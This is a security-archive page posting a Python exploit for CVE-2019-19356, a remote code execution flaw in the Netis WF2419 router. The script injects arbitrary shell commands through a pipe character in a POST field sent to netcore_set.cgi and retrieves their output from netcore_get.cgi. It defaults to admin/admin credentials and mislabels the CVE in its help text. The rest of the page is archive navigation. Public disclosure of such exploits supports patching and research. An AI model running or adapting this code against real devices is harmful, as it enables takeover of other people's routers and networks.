Netis WF2419 2.2.36123 Remote Code Execution

Netis WF2419 2.2.36123 Remote Code Execution: Posted Mar 2, 2020; Authored by Elias Issa; Netis WF2419 version 2.2.36123 suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2019-19356; SHA-256 | 22aa5eac15aadbbbe2668ffb88c241e62f80f6a1ddc35e9f7c92e0c007312e6c; Download | Favorite | View

Netis WF2419 2.2.36123 Remote Code Execution

# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution 
# Exploit Author: Elias Issa
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75
# Date: 2020-02-11
# Version: WF2419 V2.2.36123 => V2.2.36123
# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123
# CVE : CVE-2019-19356


# Proof of Concept: python netis_rce.py http://192.168.1.1 "ls"

#!/usr/bin/env python
import argparse
import requests
import json

def exploit(host,cmd):
  # Send Payload
  headers_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',  
      'Content-Type': 'application/x-www-form-urlencoded'}
  post_data="mode_name=netcore_set&tools_type=2&tools_ip_url=|+"+cmd+"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0"
  vulnerable_page = host + "/cgi-bin-igd/netcore_set.cgi"
  req_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)
  print('[+] Payload sent')
  try :
    json_data = json.loads(req_payload.text)
    if json_data[0] == "SUCCESS":
      print('[+] Exploit Sucess')
      # Get Command Result
      print('[+] Getting Command Output\n')
      result_page = host + "/cgi-bin-igd/netcore_get.cgi"
      post_data = "mode_name=netcore_get&no=no" 
      req_result = requests.post(result_page, data=post_data, headers=headers_value)
      json_data = json.loads(req_result.text)
      results = json_data["tools_results"]
      print results.replace(';', '\n')
    else:
      print('[-] Exploit Failed')
  except:
      print("[!] You might need to login.") 

# To be implemented
def login(user, password):
  print('To be implemented')

def main():
    host = args.host
    cmd = args.cmd
    user = args.user
    password = args.password
    #login(user,password)
    exploit(host,cmd)

if __name__ == "__main__":
    ap = argparse.ArgumentParser(
            description="Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]")
    ap.add_argument("host", help="URL (Example: http://192.168.1.1).")
    ap.add_argument("cmd", help="Command to run.")
    ap.add_argument("-u", "--user", help="Admin username (Default: admin).",
            default="admin")
    ap.add_argument("-p", "--password", help="Admin password (Default: admin).",
            default="admin")
    args = ap.parse_args()
    main()

Top Authors In Last 30 Days

Red Hat 252 files
Ubuntu 59 files
Debian 19 files
LiquidWorm 17 files
Apple 9 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files
Google Security Research 3 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,945)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,987)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

Netis WF2419 2.2.36123 Remote Code Execution

Netis WF2419 2.2.36123 Remote Code Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Netis WF2419 2.2.36123 Remote Code Execution

Share This

Netis WF2419 2.2.36123 Remote Code Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems